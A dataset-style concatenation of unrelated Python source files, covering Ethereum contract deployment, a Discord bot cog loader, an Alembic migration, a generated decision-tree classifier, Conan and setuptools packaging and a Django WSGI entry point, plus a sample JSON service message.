""" A wrapper around to_be_called.transact() that waits until the transaction succeeds. """
txhash = contract_method.transact(self.transaction)
LOG.debug(f"Sending txHash={encode_hex(txhash)}")
(receipt, _) = check_successful_tx(web3=self.web3, txid=txhash, timeout=self.wait)
return receipt
def send_deployment_transaction(self, contract: Contract, args: List) -> str:
txhash = None
while txhash is None:
try:
txhash = contract.constructor(*args).transact(self.transaction)
except ValueError as ex:
# pylint: disable=E1126
if ex.args[0]["code"] == -32015:
LOG.info(f"Deployment failed with {ex}. Retrying...")
else:
raise ex
return txhash
def deploy_token_contract(
self,
token_supply: int,
token_decimals: int,
token_name: str,
token_symbol: str,
token_type: str = "CustomToken",
) -> Dict[str, HexAddress]:
"""Deploy a token contract."""
receipt = self.deploy(
contract_name=token_type, args=[token_supply, token_decimals, token_name, token_symbol]
)
token_address = receipt["contractAddress"]
assert token_address and is_address(token_address)
token_address = to_checksum_address(token_address)
return {token_type: token_address}
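    # Illustrative use of the deployment entry points above (the key, gas values
    # and token parameters are placeholders, not recommendations):
    #     deployer = ContractDeployer(web3, private_key, gas_limit=6_000_000, gas_price=10)
    #     token = deployer.deploy_token_contract(10_000, 18, "TestToken", "TST")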
def deploy_raiden_contracts(
self,
max_num_of_token_networks: Optional[int],
reuse_secret_registry_from_deploy_file: Optional[Path],
settle_timeout_min: int,
settle_timeout_max: int,
) -> DeployedContracts:
""" Deploy all required raiden contracts and return a dict of contract_name:address
Args:
max_num_of_token_networks (Optional[int]): The max number of tokens that can be
registered to the TokenNetworkRegistry. If None, the argument is omitted from
the call to the constructor of TokenNetworkRegistry.
"""
deployed_contracts: DeployedContracts = {
"contracts_version": self.contract_manager.contracts_version,
"chain_id": int(self.web3.version.network),
"contracts": {},
}
if reuse_secret_registry_from_deploy_file:
reused_doc = DeployedContracts( # type: ignore
load_json_from_path(reuse_secret_registry_from_deploy_file)
)
if not reused_doc:
raise RuntimeError(
f"{reuse_secret_registry_from_deploy_file} does not contain deployment data."
)
reused_contracts = reused_doc["contracts"]
secret_registry = self.contract_instance_from_deployment_data(
reused_doc, CONTRACT_SECRET_REGISTRY
)
deployed_contracts["contracts"][CONTRACT_SECRET_REGISTRY] = deepcopy(
reused_contracts[CONTRACT_SECRET_REGISTRY]
)
else:
secret_registry = self._deploy_and_remember(
contract_name=CONTRACT_SECRET_REGISTRY,
arguments=[],
deployed_contracts=deployed_contracts,
)
token_network_registry_args = [
secret_registry.address,
deployed_contracts["chain_id"],
settle_timeout_min,
settle_timeout_max,
]
if max_num_of_token_networks:
token_network_registry_args.append(max_num_of_token_networks)
self._deploy_and_remember(
contract_name=CONTRACT_TOKEN_NETWORK_REGISTRY,
arguments=token_network_registry_args,
deployed_contracts=deployed_contracts,
)
return deployed_contracts
def _deploy_and_remember(
self, contract_name: str, arguments: List, deployed_contracts: DeployedContracts
) -> Contract:
""" Deploys contract_name with arguments and store the result in deployed_contracts. """
receipt = self.deploy(contract_name, arguments)
deployed_contracts["contracts"][contract_name] = _deployed_data_from_receipt(
receipt=receipt, constructor_arguments=arguments
)
return self.web3.eth.contract(
abi=self.contract_manager.get_contract_abi(contract_name),
address=deployed_contracts["contracts"][contract_name]["address"],
)
def register_token_network(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract."""
with_limits = contracts_version_expects_deposit_limits(self.contracts_version)
if with_limits:
return self._register_token_network_with_limits(
token_registry_abi,
token_registry_address,
token_address,
channel_participant_deposit_limit,
token_network_deposit_limit,
)
else:
return self._register_token_network_without_limits(
token_registry_abi,
token_registry_address,
token_address,
channel_participant_deposit_limit,
token_network_deposit_limit,
)
def _register_token_network_without_limits(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract
with a contracts-version that doesn't require deposit limits in the TokenNetwork
constructor.
"""
if channel_participant_deposit_limit:
raise ValueError(
"contracts_version below 0.9.0 does not expect "
"channel_participant_deposit_limit"
)
if token_network_deposit_limit:
raise ValueError(
"contracts_version below 0.9.0 does not expect token_network_deposit_limit"
)
token_network_registry = self.web3.eth.contract(
abi=token_registry_abi, address=token_registry_address
)
command = token_network_registry.functions.createERC20TokenNetwork(token_address)
self.transact(command)
token_network_address = token_network_registry.functions.token_to_token_networks(
token_address
).call()
token_network_address = to_checksum_address(token_network_address)
LOG.debug(f"TokenNetwork address: {token_network_address}")
return token_network_address
def _register_token_network_with_limits(
self,
token_registry_abi: List[Dict[str, Any]],
token_registry_address: str,
token_address: str,
channel_participant_deposit_limit: Optional[int],
token_network_deposit_limit: Optional[int],
) -> HexAddress:
"""Register token with a TokenNetworkRegistry contract
with a contracts-version that requires deposit limits in the TokenNetwork
constructor.
"""
if channel_participant_deposit_limit is None:
raise ValueError(
"contracts_version 0.9.0 and afterwards expect "
"channel_participant_deposit_limit"
)
if token_network_deposit_limit is None:
raise ValueError(
"contracts_version 0.9.0 and afterwards expect " "token_network_deposit_limit"
)
token_network_registry = self.web3.eth.contract(
abi=token_registry_abi, address=token_registry_address
)
command = token_network_registry.functions.createERC20TokenNetwork(
_token_address=token_address,
_channel_participant_deposit_limit=channel_participant_deposit_limit,
_token_network_deposit_limit=token_network_deposit_limit,
)
self.transact(command)
token_network_address = token_network_registry.functions.token_to_token_networks(
token_address
).call()
token_network_address = to_checksum_address(token_network_address)
LOG.debug(f"TokenNetwork address: {token_network_address}")
return token_network_address
def deploy_service_contracts(
self,
token_address: HexAddress,
user_deposit_whole_balance_limit: int,
service_registry_controller: HexAddress,
initial_service_deposit_price: int,
service_deposit_bump_numerator: int,
service_deposit_bump_denominator: int,
decay_constant: int,
min_price: int,
registration_duration: int,
token_network_registry_address: HexAddress,
) -> DeployedContracts:
"""Deploy 3rd party service contracts"""
if not contracts_version_has_initial_service_deposit(
self.contract_manager.contracts_version
):
raise RuntimeError("Deployment of older service contracts is not suppported.")
chain_id = int(self.web3.version.network)
deployed_contracts: DeployedContracts = {
"contracts_version": self.contract_manager.contracts_version,
"chain_id": chain_id,
"contracts": {},
}
service_registry = self._deploy_and_remember(
CONTRACT_SERVICE_REGISTRY,
[
token_address,
service_registry_controller,
initial_service_deposit_price,
service_deposit_bump_numerator,
service_deposit_bump_denominator,
decay_constant,
min_price,
registration_duration,
],
deployed_contracts,
)
user_deposit = self._deploy_and_remember(
contract_name=CONTRACT_USER_DEPOSIT,
arguments=[token_address, user_deposit_whole_balance_limit],
deployed_contracts=deployed_contracts,
)
monitoring_service_constructor_args = [
token_address,
deployed_contracts["contracts"][CONTRACT_SERVICE_REGISTRY]["address"],
deployed_contracts["contracts"][CONTRACT_USER_DEPOSIT]["address"],
token_network_registry_address,
]
msc = self._deploy_and_remember(
contract_name=CONTRACT_MONITORING_SERVICE,
arguments=monitoring_service_constructor_args,
deployed_contracts=deployed_contracts,
)
one_to_n = self._deploy_and_remember(
contract_name=CONTRACT_ONE_TO_N,
arguments=[user_deposit.address, chain_id, service_registry.address],
deployed_contracts=deployed_contracts,
)
# Tell the UserDeposit instance about other contracts.
LOG.debug(
"Calling UserDeposit.init() with "
f"msc_address={msc.address} "
f"one_to_n_address={one_to_n.address}"
)
self.transact(
user_deposit.functions.init(
_msc_address=msc.address, _one_to_n_address=one_to_n.address
)
)
return deployed_contracts
def _deployed_data_from_receipt(receipt: Dict, constructor_arguments: List) -> DeployedContract:
return {
"address": to_checksum_address(receipt["contractAddress"]),
"transaction_hash": encode_hex(receipt["transactionHash"]),
"block_number": receipt["blockNumber"],
"gas_cost": receipt["gasUsed"],
"constructor_arguments": constructor_arguments,
}
| 39.783715 | 99 | 0.664854 |
794617d0128f5db9d05c9f897dbb0803c804e28a | 949 | py | Python | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | ["Apache-2.0"] | 18 | 2019-01-18T07:00:26.000Z | 2021-09-22T00:12:40.000Z | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | ["Apache-2.0"] | 43 | 2019-04-28T01:31:17.000Z | 2022-03-08T02:17:55.000Z | shell/__init__.py | jack1142/JackCogs | ad3b5c43e4597f92816db8f0974f8f61d511abc3 | ["Apache-2.0"] | 20 | 2020-01-21T10:49:37.000Z | 2022-03-21T02:16:45.000Z |
# Copyright 2018-2021 Jakub Kuczys (https://github.com/jack1142)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from pathlib import Path
from redbot.core.bot import Red
from .shell import Shell
with open(Path(__file__).parent / "info.json") as fp:
__red_end_user_data_statement__ = json.load(fp)["end_user_data_statement"]
async def setup(bot: Red) -> None:
cog = Shell(bot)
await cog.initialize()
bot.add_cog(cog)
| 31.633333 | 78 | 0.74921 |
794618305073dfca1b6c2753077ddf141c84edd4 | 1,272 | py | Python | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | ["MIT"] | null | null | null | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | ["MIT"] | null | null | null | singular-format-new.py | gourishankarseal/Assignment-Cohomology-of-Bott-Samelson-manifolds | a8e4fc67e48928894e638b6944759c548061fcf7 | ["MIT"] | null | null | null |
name = ["A"];
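# Overview (inferred from the code in this script): each input file A, test1..testN
# has its lines wrapped into Singular `vector`/`module` declarations written to a
# matching Singular<name> file, and a final "Singularlists" file names the
# generated inputs as Singular list variables.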
n = int(raw_input("Enter number of fixed points:"))
for i in range(1,n+1):
name = name + ["test"+`i`];
# List name should look like this:
#name = ["A", "test1", "test2", "test3", "test4", "test5", "test6", "test7", "test8"];
fp = len(name);
for j in range(0,fp):
f=open(name[j])
lines=f.read().splitlines()
#print(len(lines))
foo=open('Singular'+name[j],'wb+')
if len(lines)>1:
for i in range(0,len(lines)):
foo.write('vector s'+`i+1`+'='+'['+lines[i]+'];\n')
string = ""
if len(lines)>1:
for i in range(0,len(lines)):
if i == 0:
string = 's' +`i+1`
else:
string = string + ','+'s' +`i+1`
#print string+';'
if len(lines)>1:
foo.write('module m'+'='+ string + ';')
f.close()
foo.close()
import string
foo=open('Singularlists','wb+')
#n = int(raw_input("Enter number of files to be formatted:"))
vertex = [];
for i in range(1,n+1):
vertex = vertex + [i]
s = str(vertex);
foo.write("list vertex" + "=" + s[1:len(s)-1] + ";")
sing = [];
for i in range(1,n+1):
sing = sing + ["\"Singulartest"+`i`+"\""] # Note the bounding ""
s = str(sing).replace('\'',''); #this replaces the '' with a blank character
foo.write("\n\nlist sing "+ "=" + str(s[1:len(s)-1])+";")
foo.close()
| 14.964706 | 86 | 0.545597 |
7946185da63c8a9d9f675167708cde789e3321d4 | 2,300 | py | Python | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/277b5fbb41d3_switch_heartbeats_executable.py | nimishbongale/rucio | 21c93bd7d02dbc70bc3127ad77fb1a1981b83058 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' switch heartbeats executable '''
import sqlalchemy as sa
from alembic import context
from alembic.op import create_primary_key, add_column, drop_constraint, drop_column
from rucio.db.sqla.models import String
# Alembic revision identifiers
revision = '277b5fbb41d3'
down_revision = '44278720f774'
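# Typically applied through Alembic's command interface, e.g.
#     alembic upgrade 277b5fbb41d3
# (illustrative; the actual invocation depends on how the Rucio tooling wraps Alembic).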
def upgrade():
'''
Upgrade the database to this revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_constraint('heartbeats_pk', 'heartbeats', type_='primary')
schema = context.get_context().version_table_schema if context.get_context().version_table_schema else ''
drop_column('heartbeats', 'executable', schema=schema)
add_column('heartbeats', sa.Column('executable', String(64)), schema=schema)
add_column('heartbeats', sa.Column('readable', String(4000)), schema=schema)
create_primary_key('HEARTBEATS_PK', 'heartbeats', ['executable', 'hostname', 'pid', 'thread_id'])
def downgrade():
'''
Downgrade the database to the previous revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_constraint('heartbeats_pk', 'heartbeats', type_='primary')
schema = context.get_context().version_table_schema if context.get_context().version_table_schema else ''
drop_column('heartbeats', 'executable', schema=schema)
drop_column('heartbeats', 'readable', schema=schema)
add_column('heartbeats', sa.Column('executable', String(767)), schema=schema)
create_primary_key('HEARTBEATS_PK', 'heartbeats', ['executable', 'hostname', 'pid', 'thread_id'])
| 40.350877 | 113 | 0.72 |
7946190009f89f5e1895590f9a2efdb2024346d0 | 7,100 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/11_features/numtrees_8/rule_5.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Passanger, obj[1]: Time, obj[2]: Coupon, obj[3]: Age, obj[4]: Education, obj[5]: Occupation, obj[6]: Bar, obj[7]: Coffeehouse, obj[8]: Restaurant20to50, obj[9]: Direction_same, obj[10]: Distance
# {"feature": "Coupon", "instances": 127, "metric_value": 0.9762, "depth": 1}
if obj[2]>0:
# {"feature": "Passanger", "instances": 106, "metric_value": 0.9245, "depth": 2}
if obj[0]>0:
# {"feature": "Occupation", "instances": 98, "metric_value": 0.9486, "depth": 3}
if obj[5]>4:
# {"feature": "Bar", "instances": 68, "metric_value": 0.874, "depth": 4}
if obj[6]<=1.0:
# {"feature": "Coffeehouse", "instances": 46, "metric_value": 0.7131, "depth": 5}
if obj[7]<=2.0:
# {"feature": "Age", "instances": 36, "metric_value": 0.8113, "depth": 6}
if obj[3]>1:
# {"feature": "Education", "instances": 19, "metric_value": 0.9495, "depth": 7}
if obj[4]<=3:
# {"feature": "Time", "instances": 17, "metric_value": 0.874, "depth": 8}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.9403, "depth": 9}
if obj[8]>0.0:
# {"feature": "Distance", "instances": 13, "metric_value": 0.8905, "depth": 10}
if obj[10]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.8813, "depth": 11}
if obj[9]<=0:
return 'True'
else: return 'True'
elif obj[10]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.9183, "depth": 11}
if obj[9]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[4]>3:
return 'False'
else: return 'False'
elif obj[3]<=1:
# {"feature": "Distance", "instances": 17, "metric_value": 0.5226, "depth": 7}
if obj[10]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.7219, "depth": 8}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.5033, "depth": 9}
if obj[9]<=0:
return 'True'
elif obj[9]>0:
# {"feature": "Education", "instances": 2, "metric_value": 1.0, "depth": 10}
if obj[4]<=2:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 1.0, "depth": 11}
if obj[8]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[10]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[6]>1.0:
# {"feature": "Education", "instances": 22, "metric_value": 1.0, "depth": 5}
if obj[4]<=2:
# {"feature": "Distance", "instances": 20, "metric_value": 0.9928, "depth": 6}
if obj[10]<=2:
# {"feature": "Coffeehouse", "instances": 18, "metric_value": 0.9641, "depth": 7}
if obj[7]<=2.0:
# {"feature": "Age", "instances": 13, "metric_value": 0.9957, "depth": 8}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.9799, "depth": 9}
if obj[9]<=0:
# {"feature": "Time", "instances": 11, "metric_value": 0.9457, "depth": 10}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 10, "metric_value": 0.971, "depth": 11}
if obj[8]<=2.0:
return 'False'
elif obj[8]>2.0:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[9]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[10]>2:
return 'False'
else: return 'False'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]<=4:
# {"feature": "Age", "instances": 30, "metric_value": 0.9968, "depth": 4}
if obj[3]<=4:
# {"feature": "Restaurant20to50", "instances": 23, "metric_value": 0.9877, "depth": 5}
if obj[8]<=1.0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.9975, "depth": 6}
if obj[6]<=1.0:
# {"feature": "Time", "instances": 12, "metric_value": 0.9799, "depth": 7}
if obj[1]<=3:
# {"feature": "Education", "instances": 9, "metric_value": 0.9911, "depth": 8}
if obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 1.0, "depth": 9}
if obj[7]>0.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.9183, "depth": 10}
if obj[9]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.7219, "depth": 11}
if obj[10]<=2:
return 'False'
elif obj[10]>2:
return 'True'
else: return 'True'
elif obj[9]>0:
return 'True'
else: return 'True'
elif obj[7]<=0.0:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[6]>1.0:
# {"feature": "Coffeehouse", "instances": 5, "metric_value": 0.7219, "depth": 7}
if obj[7]<=3.0:
return 'False'
elif obj[7]>3.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Time", "instances": 6, "metric_value": 0.65, "depth": 6}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]>2:
return 'False'
elif obj[4]<=2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[3]>4:
# {"feature": "Time", "instances": 7, "metric_value": 0.5917, "depth": 5}
if obj[1]<=3:
return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[2]<=0:
# {"feature": "Education", "instances": 21, "metric_value": 0.7919, "depth": 2}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
# {"feature": "Distance", "instances": 10, "metric_value": 1.0, "depth": 3}
if obj[10]<=2:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.8631, "depth": 4}
if obj[5]>2:
return 'True'
elif obj[5]<=2:
return 'False'
else: return 'False'
elif obj[10]>2:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
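# Example call (illustrative 11-element feature vector, ordered as documented in
# the comment on the function signature above):
#     findDecision([1, 2, 1, 2, 1, 5, 1.0, 2.0, 1.0, 0, 1])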
| 37.368421 | 226 | 0.511268 |
794619a3eb1c558b6756b0bad6fea5eb05b2f850 | 2,084 | py | Python | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 562 | 2019-09-04T12:23:43.000Z | 2022-03-29T16:41:43.000Z | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 9,799 | 2019-09-04T12:02:11.000Z | 2022-03-31T23:55:45.000Z | recipes/libsvm/all/conanfile.py | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 1,126 | 2019-09-04T11:57:46.000Z | 2022-03-31T16:43:38.000Z | from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.33.0"
class libsvmConan(ConanFile):
name = "libsvm"
description = "Libsvm is a simple, easy-to-use, and efficient software for SVM classification and regression"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://www.csie.ntu.edu.tw/~cjlin/libsvm/"
license = "BSD-3-Clause"
topics = ("conan", "svm", "vector")
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
def validate(self):
if (
self.settings.compiler == "Visual Studio" and
"MT" in self.settings.compiler.runtime and
self.options.shared
):
raise ConanInvalidConfiguration(
"{} can not be built as shared library + runtime {}.".format(
self.name,
self.settings.compiler.runtime
)
)
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if not self._cmake:
self._cmake = CMake(self)
self._cmake.configure()
return self._cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("COPYRIGHT", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = ["svm"]
| 31.104478 | 113 | 0.603647 |
794619c716f77e67926aaa4e18203d3e0c4c760a | 2,235 | py | Python | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 4 | 2017-06-30T01:32:52.000Z | 2019-07-03T15:46:24.000Z | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | 3 | 2021-03-22T17:13:51.000Z | 2021-12-13T19:40:20.000Z | yitu/models/user.py | 1ibrary/1ibrary-gzhu | 768af1837d6caa185c101cc82ea67efc931865c1 | [
"Apache-2.0"
] | null | null | null | """
Author: Tyan boot <[email protected]>
Date: 2017/6/20
"""
# -*- coding: utf-8 -*-
from itsdangerous import TimedJSONWebSignatureSerializer
from yitu import db
from yitu.models.book_list import BookList
from yitu.models.subscribe import Subscribe
from flask import g
class User(db.Model):
__tablename__ = "users"
id_ = db.Column(db.Integer, primary_key=True)
xh = db.Column(db.String(10), unique=True, index=True)
name = db.Column(db.Text)
password_hash = db.Column(db.Text)
subscribing = db.relationship('Subscribe',
foreign_keys=[Subscribe.user_id],
backref=db.backref('user', lazy='joined'))
book_lists = db.relationship("BookList",
foreign_keys=BookList.user_id,
backref=db.backref('user', lazy='joined'))
@staticmethod
def verify_token(token):
from flask import current_app
expire_time = current_app.config.get("EXPIRES_TIME") or 3600
token_key = current_app.config["APP_KEY"]
s = TimedJSONWebSignatureSerializer(token_key, expires_in=expire_time)
try:
d = s.loads(token)
user = User.query.get(d["uid"])
g.session_id = d["session"]
return user
except:
return None
@property
def password(self):
return None
@password.setter
def password(self, pwd):
import hashlib
s = hashlib.sha1()
s.update(pwd.encode("ascii"))
self.password_hash = s.hexdigest()
def verify_password(self, pwd):
import hashlib
s = hashlib.sha1()
s.update(pwd.encode("ascii"))
if s.hexdigest() != self.password_hash:
return False
else:
return True
def generate_token(self, session):
from flask import current_app
expire_time = current_app.config.get("EXPIRES_TIME") or 3600
token_key = current_app.config["APP_KEY"]
s = TimedJSONWebSignatureSerializer(token_key, expires_in=expire_time)
d = s.dumps({"username": self.xh, "uid": self.id_, "session": session})
return d.decode("ascii")
| 27.9375 | 79 | 0.605369 |
79461b73541bd0905e066cb05d8ff23209216b4d | 397 | py | Python | filelocker/wsgi.py | Yogeswari-Sahu/HackOff | 0c66e13dafc15f354fe5d8058a68a24532fbf3c0 | [
"MIT"
] | 1 | 2020-12-29T17:24:19.000Z | 2020-12-29T17:24:19.000Z | filelocker/filelocker/wsgi.py | Hawk453/HackOff | 41d7b44ae3777e95d1e1d8f2284241907f15f3c3 | [
"MIT"
] | null | null | null | filelocker/filelocker/wsgi.py | Hawk453/HackOff | 41d7b44ae3777e95d1e1d8f2284241907f15f3c3 | [
"MIT"
] | 3 | 2020-12-13T09:43:27.000Z | 2020-12-13T19:52:12.000Z | """
WSGI config for filelocker project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'filelocker.settings')
application = get_wsgi_application()
| 23.352941 | 78 | 0.788413 |
79461baec98140d266b1fe3450d3334ba0d903e2 | 661 | py | Python | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | evaluador_consola.py | RicardoGomezT/Normalizacion_JSON_con_PySpark | 129e9fa1b4f32af1da3aff47741623cafa669ed4 | [
"MIT"
] | null | null | null | {"consumidor":{"app_consumer":{"id":"BUN-09348","session_id":"07e3ged1520","transaction_id":"12345"},"device_consumer":{"id":"device-111","user_agent":"Mozilla/5.0(iPhone)","locale":"CO","ip":"200.122.xxx.254","terminal_id":"372343"}},"operacion":{"type":"CONSULTA","operation_date":"2019-08-13T20:00:54.832Z","source_reference":{"type":"PRODUCT","product":{"type":"0160","details_product":{"details":[{"detail_item":{"name":"SOLICITUD","value":"123"}}]}}},"status_response":{"status":"OK"}},"messages_respuesta":{"service":[{"service_details":{"id_service":"","request_service":"</soapenv:Envelope>","response_service":"<SResponse></S:Body></S:Envelope>"}}]}} | 661 | 661 | 0.686838 |
79461c1ac8f355b7136c503db580e69d25612a6a | 2,795 | py | Python | cli/setup.py | ddeidda/aws-parallelcluster | b1f468d2283168dfd2992f791cee79bef3a4920a | [
"Apache-2.0"
] | null | null | null | cli/setup.py | ddeidda/aws-parallelcluster | b1f468d2283168dfd2992f791cee79bef3a4920a | [
"Apache-2.0"
] | 1 | 2020-11-16T11:07:22.000Z | 2020-11-16T11:07:22.000Z | cli/setup.py | rexcsn/aws-parallelcluster | be5f5fd926e4bd942df3da907351e5de99d49485 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import os
from setuptools import find_packages, setup
def readme():
"""Read the README file and use it as long description."""
with open(os.path.join(os.path.dirname(__file__), "README")) as f:
return f.read()
VERSION = "2.10.3"
REQUIRES = [
"setuptools",
"boto3>=1.16.14",
"tabulate>=0.8.2,<0.8.10",
"ipaddress>=1.0.22",
"PyYAML>=5.3.1",
"jinja2>=2.11.0",
]
setup(
name="aws-parallelcluster",
version=VERSION,
author="Amazon Web Services",
description="AWS ParallelCluster is an AWS supported Open Source cluster management tool to deploy "
"and manage HPC clusters in the AWS cloud.",
url="https://github.com/aws/aws-parallelcluster",
license="Apache License 2.0",
package_dir={"": "src"},
packages=find_packages("src"),
python_requires=">=3.6",
install_requires=REQUIRES,
entry_points={
"console_scripts": [
"pcluster = pcluster.cli:main",
"pcluster-config = pcluster_config.cli:main",
"awsbqueues = awsbatch.awsbqueues:main",
"awsbhosts = awsbatch.awsbhosts:main",
"awsbstat = awsbatch.awsbstat:main",
"awsbkill = awsbatch.awsbkill:main",
"awsbsub = awsbatch.awsbsub:main",
"awsbout = awsbatch.awsbout:main",
]
},
include_package_data=True,
zip_safe=False,
package_data={"": ["src/examples/config"]},
long_description=readme(),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
